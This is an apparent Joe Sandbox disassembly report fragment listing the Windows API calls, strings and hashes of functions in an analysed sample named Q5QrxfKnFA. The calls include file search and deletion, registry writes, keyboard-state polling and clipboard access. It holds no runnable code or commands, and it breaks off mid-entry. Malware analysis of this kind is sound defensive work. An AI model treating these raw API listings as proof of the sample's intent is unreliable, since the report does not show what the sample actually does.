                                                        • __swprintf.LIBCMT ref: 003AC8D3
                                                          • Part of subcall function 00347DE1: _memmove.LIBCMT ref: 00347E22
                                                        • __swprintf.LIBCMT ref: 003AC927
                                                          • Part of subcall function 00363698: __woutput_l.LIBCMT ref: 003636F1
                                                        • __swprintf.LIBCMT ref: 003AC975
                                                          • Part of subcall function 00363698: __flsbuf.LIBCMT ref: 00363713
                                                          • Part of subcall function 00363698: __flsbuf.LIBCMT ref: 0036372B
                                                        • __swprintf.LIBCMT ref: 003AC9C4
                                                        • __swprintf.LIBCMT ref: 003ACA13
                                                        • __swprintf.LIBCMT ref: 003ACA62
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                                        • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                        • API String ID: 3953360268-2428617273
                                                        • Opcode ID: e08f3ca68430eaa0e8d88dddde65d79a1963b31120a7d56f86151dc3e746735b
                                                        • Instruction ID: 10e154fb380002d15e9106d4c942cd221b7391c61119022ec1b616356a3888b9
                                                        • Opcode Fuzzy Hash: e08f3ca68430eaa0e8d88dddde65d79a1963b31120a7d56f86151dc3e746735b
                                                        • Instruction Fuzzy Hash: C6A120B1414345ABC712EFA4C885EAFB7ECFF95704F40491AF595CA191EB34EA08CB62
                                                        APIs
                                                        • FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 003AEFB6
                                                        • _wcscmp.LIBCMT ref: 003AEFCB
                                                        • _wcscmp.LIBCMT ref: 003AEFE2
                                                        • GetFileAttributesW.KERNEL32(?), ref: 003AEFF4
                                                        • SetFileAttributesW.KERNEL32(?,?), ref: 003AF00E
                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 003AF026
                                                        • FindClose.KERNEL32(00000000), ref: 003AF031
                                                        • FindFirstFileW.KERNEL32(*.*,?), ref: 003AF04D
                                                        • _wcscmp.LIBCMT ref: 003AF074
                                                        • _wcscmp.LIBCMT ref: 003AF08B
                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 003AF09D
                                                        • SetCurrentDirectoryW.KERNEL32(003F8920), ref: 003AF0BB
                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 003AF0C5
                                                        • FindClose.KERNEL32(00000000), ref: 003AF0D2
                                                        • FindClose.KERNEL32(00000000), ref: 003AF0E4
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                        • String ID: *.*
                                                        • API String ID: 1803514871-438819550
                                                        • Opcode ID: 610c79404053e4166d26f7911f14b8d9e19d529f73e8993a812e91985bca2a4a
                                                        • Instruction ID: aaf96ae10375eadcf8459bfa240e75b1c46f19a1d5243a549438dfa551179261
                                                        • Opcode Fuzzy Hash: 610c79404053e4166d26f7911f14b8d9e19d529f73e8993a812e91985bca2a4a
                                                        • Instruction Fuzzy Hash: B031BF365012186EDB16EBB4EC48EEEB7ADDF4A360F114176E904E30A1DB70EE44CB65
                                                        APIs
                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 003C0953
                                                        • RegCreateKeyExW.ADVAPI32(?,?,00000000,003CF910,00000000,?,00000000,?,?), ref: 003C09C1
                                                        • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 003C0A09
                                                        • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 003C0A92
                                                        • RegCloseKey.ADVAPI32(?), ref: 003C0DB2
                                                        • RegCloseKey.ADVAPI32(00000000), ref: 003C0DBF
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: Close$ConnectCreateRegistryValue
                                                        • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                        • API String ID: 536824911-966354055
                                                        • Opcode ID: 907b26f7de368c1af56a92bbd66ee35428a104c54bece0622184f5ac846c8024
                                                        • Instruction ID: 4956a700ae72bc36828af50130498971e7eec188834f4b791a9b4443a078b77e
                                                        • Opcode Fuzzy Hash: 907b26f7de368c1af56a92bbd66ee35428a104c54bece0622184f5ac846c8024
                                                        • Instruction Fuzzy Hash: 640225756006519FCB16EF28C845E2AB7E5EF89710F05885DF88A9F262CB31FC41CB81
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 0D>$0E>$0F>$3c5$ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)$pG>$_5
                                                        • API String ID: 0-2011058494
                                                        • Opcode ID: 9bb2de73420199f05d5f8bc667b868f48940881e865b30b332cffcb08809946b
                                                        • Instruction ID: f06de2abe21fe81f4a08969e224642d17ecab9a997c793b2c82db166ae341fb5
                                                        • Opcode Fuzzy Hash: 9bb2de73420199f05d5f8bc667b868f48940881e865b30b332cffcb08809946b
                                                        • Instruction Fuzzy Hash: 8D727075E0021A9BDF16CF59C881BAEB7B5FF48310F55816AE805FB690E7309E85CB90
                                                        APIs
                                                        • FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 003AF113
                                                        • _wcscmp.LIBCMT ref: 003AF128
                                                        • _wcscmp.LIBCMT ref: 003AF13F
                                                          • Part of subcall function 003A4385: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 003A43A0
                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 003AF16E
                                                        • FindClose.KERNEL32(00000000), ref: 003AF179
                                                        • FindFirstFileW.KERNEL32(*.*,?), ref: 003AF195
                                                        • _wcscmp.LIBCMT ref: 003AF1BC
                                                        • _wcscmp.LIBCMT ref: 003AF1D3
                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 003AF1E5
                                                        • SetCurrentDirectoryW.KERNEL32(003F8920), ref: 003AF203
                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 003AF20D
                                                        • FindClose.KERNEL32(00000000), ref: 003AF21A
                                                        • FindClose.KERNEL32(00000000), ref: 003AF22C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                        • String ID: *.*
                                                        • API String ID: 1824444939-438819550
                                                        • Opcode ID: 4dac008f8eed7ccffb533da1c902320119bc1aa0334a1edf778f53856a95cb50
                                                        • Instruction ID: 7016533af811cbc2aca2673339153cf5ad3aa2ec515d4b8d3c828020e53dc552
                                                        • Opcode Fuzzy Hash: 4dac008f8eed7ccffb533da1c902320119bc1aa0334a1edf778f53856a95cb50
                                                        • Instruction Fuzzy Hash: 9231CE3A50021DAECB26ABA4EC49FEE77ADDF86360F114575E900E30A0DB70DE45CB64
                                                        APIs
                                                        • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 003AA20F
                                                        • __swprintf.LIBCMT ref: 003AA231
                                                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 003AA26E
                                                        • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 003AA293
                                                        • _memset.LIBCMT ref: 003AA2B2
                                                        • _wcsncpy.LIBCMT ref: 003AA2EE
                                                        • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 003AA323
                                                        • CloseHandle.KERNEL32(00000000), ref: 003AA32E
                                                        • RemoveDirectoryW.KERNEL32(?), ref: 003AA337
                                                        • CloseHandle.KERNEL32(00000000), ref: 003AA341
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                        • String ID: :$\$\??\%s
                                                        • API String ID: 2733774712-3457252023
                                                        • Opcode ID: b939e1d002bd0a31e2cf44611d6e05ab3797fd2b39f008baea8dd89fb2212425
                                                        • Instruction ID: 45e6b2d6c483cc2b822ff0170667f2a1cd062632921dbb44b83b3abb4199eda3
                                                        • Opcode Fuzzy Hash: b939e1d002bd0a31e2cf44611d6e05ab3797fd2b39f008baea8dd89fb2212425
                                                        • Instruction Fuzzy Hash: BC31E8B6500109ABDB22DFA0DC45FEB77BDEF89740F1040B6F508D61A0E7749644CB25
                                                        APIs
                                                        • GetKeyboardState.USER32(?), ref: 003A0097
                                                        • SetKeyboardState.USER32(?), ref: 003A0102
                                                        • GetAsyncKeyState.USER32(000000A0), ref: 003A0122
                                                        • GetKeyState.USER32(000000A0), ref: 003A0139
                                                        • GetAsyncKeyState.USER32(000000A1), ref: 003A0168
                                                        • GetKeyState.USER32(000000A1), ref: 003A0179
                                                        • GetAsyncKeyState.USER32(00000011), ref: 003A01A5
                                                        • GetKeyState.USER32(00000011), ref: 003A01B3
                                                        • GetAsyncKeyState.USER32(00000012), ref: 003A01DC
                                                        • GetKeyState.USER32(00000012), ref: 003A01EA
                                                        • GetAsyncKeyState.USER32(0000005B), ref: 003A0213
                                                        • GetKeyState.USER32(0000005B), ref: 003A0221
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: State$Async$Keyboard
                                                        • String ID:
                                                        • API String ID: 541375521-0
                                                        • Opcode ID: 5d8d1a0bc4d060ea4bea87759d2d08d021f6a4932f0c9c969833fbbdcb824733
                                                        • Instruction ID: 152f41aedeb8f06eaf4a428a2a135e2c93c257d20365ebedccb6e63d60b88274
                                                        • Opcode Fuzzy Hash: 5d8d1a0bc4d060ea4bea87759d2d08d021f6a4932f0c9c969833fbbdcb824733
                                                        • Instruction Fuzzy Hash: 6F51C92490478829FB3ADBB088547EABFB4DF13380F09459E95C25B5C2DAA49B8CC761
                                                        APIs
                                                          • Part of subcall function 003C0E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,003BFDAD,?,?), ref: 003C0E31
                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 003C04AC
                                                          • Part of subcall function 00349837: __itow.LIBCMT ref: 00349862
                                                          • Part of subcall function 00349837: __swprintf.LIBCMT ref: 003498AC
                                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 003C054B
                                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 003C05E3
                                                        • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 003C0822
                                                        • RegCloseKey.ADVAPI32(00000000), ref: 003C082F
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                        • String ID:
                                                        • API String ID: 1240663315-0
                                                        • Opcode ID: 05a3e864cbeb92ff37774cd753cd78800c227fecc1e3f4fc7cdb911459e3db4a
                                                        • Instruction ID: be84b923518846715e36967f827d6afd6cc1f4a1ccd06d06428122564bc95c40
                                                        • Opcode Fuzzy Hash: 05a3e864cbeb92ff37774cd753cd78800c227fecc1e3f4fc7cdb911459e3db4a
                                                        • Instruction Fuzzy Hash: 2FE14D71604210EFCB1ADF28C891E6BBBE9EF89714F04856DF84ADB261D631ED01CB91
                                                        APIs
                                                          • Part of subcall function 00349837: __itow.LIBCMT ref: 00349862
                                                          • Part of subcall function 00349837: __swprintf.LIBCMT ref: 003498AC
                                                        • CoInitialize.OLE32 ref: 003B8403
                                                        • CoUninitialize.OLE32 ref: 003B840E
                                                        • CoCreateInstance.OLE32(?,00000000,00000017,003D2BEC,?), ref: 003B846E
                                                        • IIDFromString.OLE32(?,?), ref: 003B84E1
                                                        • VariantInit.OLEAUT32(?), ref: 003B857B
                                                        • VariantClear.OLEAUT32(?), ref: 003B85DC
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                        • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                        • API String ID: 834269672-1287834457
                                                        • Opcode ID: efc6c043e9a1f0cdc4ac0ae83646f9598696355c6f91c0fd7d8b7781f08102c2
                                                        • Instruction ID: e72ff2bd9cfde0abdb3549dda4d92c06eb2c31120737a205ef775898ed27e5fd
                                                        • Opcode Fuzzy Hash: efc6c043e9a1f0cdc4ac0ae83646f9598696355c6f91c0fd7d8b7781f08102c2
                                                        • Instruction Fuzzy Hash: D66180706083129FC712DF55C849FABB7ECAF4A758F04481AFA859B691CB70ED44CB92
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                        • String ID:
                                                        • API String ID: 1737998785-0
                                                        • Opcode ID: e83036685b9d00f2d0ff837994a090dc768155fb7983312ca1b0e5822975f5e1
                                                        • Instruction ID: 843f03bd0b9c749671f90cd4a28287cb5282ea7c9ad9f570742b0f408282bb15
                                                        • Opcode Fuzzy Hash: e83036685b9d00f2d0ff837994a090dc768155fb7983312ca1b0e5822975f5e1
                                                        • Instruction Fuzzy Hash: 092194356002109FDB129F14EC09F6A7BADEF45715F11802AFA46DF262DB30BC00CB58
                                                        APIs
                                                          • Part of subcall function 00344750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00344743,?,?,003437AE,?), ref: 00344770
                                                          • Part of subcall function 003A4A31: GetFileAttributesW.KERNEL32(?,003A370B), ref: 003A4A32
                                                        • FindFirstFileW.KERNEL32(?,?), ref: 003A38A3
                                                        • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 003A394B
                                                        • MoveFileW.KERNEL32(?,?), ref: 003A395E
                                                        • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 003A397B
                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 003A399D
                                                        • FindClose.KERNEL32(00000000,?,?,?,?), ref: 003A39B9
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                                        • String ID: \*.*
                                                        • API String ID: 4002782344-1173974218
                                                        • Opcode ID: 5897b18ce30b67085a039bbce9204f006625f446e927a547a06713462d41191b
                                                        • Instruction ID: 5a9371111f1fef8e9f32a29315cb323ace065189e05b8e56062a1ebc9b4e5484
                                                        • Opcode Fuzzy Hash: 5897b18ce30b67085a039bbce9204f006625f446e927a547a06713462d41191b
                                                        • Instruction Fuzzy Hash: AE51403180514CAACF17EBA0D992AEEB7B9EF16300F604069F405BF192EB756F09CB51
                                                        APIs
                                                          • Part of subcall function 00347DE1: _memmove.LIBCMT ref: 00347E22
                                                        • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 003AF440
                                                        • Sleep.KERNEL32(0000000A), ref: 003AF470
                                                        • _wcscmp.LIBCMT ref: 003AF484
                                                        • _wcscmp.LIBCMT ref: 003AF49F
                                                        • FindNextFileW.KERNEL32(?,?), ref: 003AF53D
                                                        • FindClose.KERNEL32(00000000), ref: 003AF553
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                                        • String ID: *.*
                                                        • API String ID: 713712311-438819550
                                                        • Opcode ID: 37517ebb45e765469afbd4c3b8618f308a9ddd5b1e3ba308d2156308f59f7271
                                                        • Instruction ID: 7ae5307919725a20b874b881e3e14151a90e729a44463508ea64ec86faac4e9c
                                                        • Opcode Fuzzy Hash: 37517ebb45e765469afbd4c3b8618f308a9ddd5b1e3ba308d2156308f59f7271
                                                        • Instruction Fuzzy Hash: 73415C71D0021AAFCF16EFA4CC55AEEBBB8FF06310F144566E815AB191DB30AE44CB50
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: __itow__swprintf
                                                        • String ID: 3c5$_5
                                                        • API String ID: 674341424-2150917133
                                                        • Opcode ID: 9003c192cd7509c9234c43b8851f7b34300509142a28c0a187c2a3dc400f1af7
                                                        • Instruction ID: 98730d50eeef9dc74cad0fc4e75d339c630f8f743fb25bcb444419bf081989f2
                                                        • Opcode Fuzzy Hash: 9003c192cd7509c9234c43b8851f7b34300509142a28c0a187c2a3dc400f1af7
                                                        • Instruction Fuzzy Hash: E02291716083009FC726DF24C892F6FB7E5AF84750F11491DF99A9B2A1DB71E908CB92
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: _memmove
                                                        • String ID:
                                                        • API String ID: 4104443479-0
                                                        • Opcode ID: d2f3dcc643f1090f3f2d96ffab7f00fca499c2c818069c2fd1c98b72c740b3a7
                                                        • Instruction ID: 064358e13f1369677c205485b69cc8ada8c74a35a1a5a3f524c3a01733d4a048
                                                        • Opcode Fuzzy Hash: d2f3dcc643f1090f3f2d96ffab7f00fca499c2c818069c2fd1c98b72c740b3a7
                                                        • Instruction Fuzzy Hash: A7128F70A00609DFDF0ADFA5D991AAEB7F5FF48310F104529E846EB261EB36AD14CB50
                                                        APIs
                                                          • Part of subcall function 00344750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00344743,?,?,003437AE,?), ref: 00344770
                                                          • Part of subcall function 003A4A31: GetFileAttributesW.KERNEL32(?,003A370B), ref: 003A4A32
                                                        • FindFirstFileW.KERNEL32(?,?), ref: 003A3B89
                                                        • DeleteFileW.KERNEL32(?,?,?,?), ref: 003A3BD9
                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 003A3BEA
                                                        • FindClose.KERNEL32(00000000), ref: 003A3C01
                                                        • FindClose.KERNEL32(00000000), ref: 003A3C0A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
